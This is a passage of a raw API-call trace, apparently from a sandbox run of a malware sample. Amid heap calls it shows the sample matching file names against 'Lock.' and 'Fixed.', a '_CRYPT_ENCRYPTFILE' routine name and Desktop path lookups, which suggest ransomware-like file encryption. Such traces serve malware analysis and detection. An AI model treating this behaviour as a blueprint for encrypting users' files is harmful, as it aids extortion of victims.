[0210.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0210.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0210.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0210.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0210.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0210.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0210.445] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0210.445] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.445] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0210.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0210.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0210.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0210.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0210.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0210.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0210.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0210.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0210.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0210.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0210.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0210.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wg77xQT1-Aj18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g77xQT1-Aj18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="77xQT1-Aj18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7xQT1-Aj18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xQT1-Aj18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QT1-Aj18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T1-Aj18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1-Aj18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Aj18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Aj18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="18nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nXa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xa8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0210.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0210.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0210.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0210.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0210.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0210.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0210.447] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0210.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0210.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0210.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0210.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0210.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0210.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0210.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0210.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2e) returned 0x2e7fbc8 [0210.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wg77xQT1-Aj18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g77xQT1-Aj18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="77xQT1-Aj18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7xQT1-Aj18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xQT1-Aj18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QT1-Aj18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T1-Aj18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1-Aj18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-Aj18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Aj18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="18nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nXa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xa8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8K.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0210.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0210.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0210.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0210.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0210.449] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0210.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0210.449] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0210.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0210.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0210.450] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0210.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0210.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0210.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0210.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0210.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0210.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0210.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0210.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0210.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0210.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0210.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0210.451] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0210.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0210.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0210.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0210.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0210.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0210.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0210.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0210.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0210.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0210.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0210.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0210.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0210.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0210.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0210.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0210.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0210.493] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0210.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0210.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53878 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0210.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0210.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0210.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0210.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0210.495] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0210.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0210.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0210.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0210.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0210.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0210.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0210.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0210.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0210.496] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0210.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0210.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0210.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0210.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0210.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0210.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0210.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0210.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0210.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0210.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0210.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0210.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0210.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0210.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0210.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0210.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0210.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0210.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0210.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 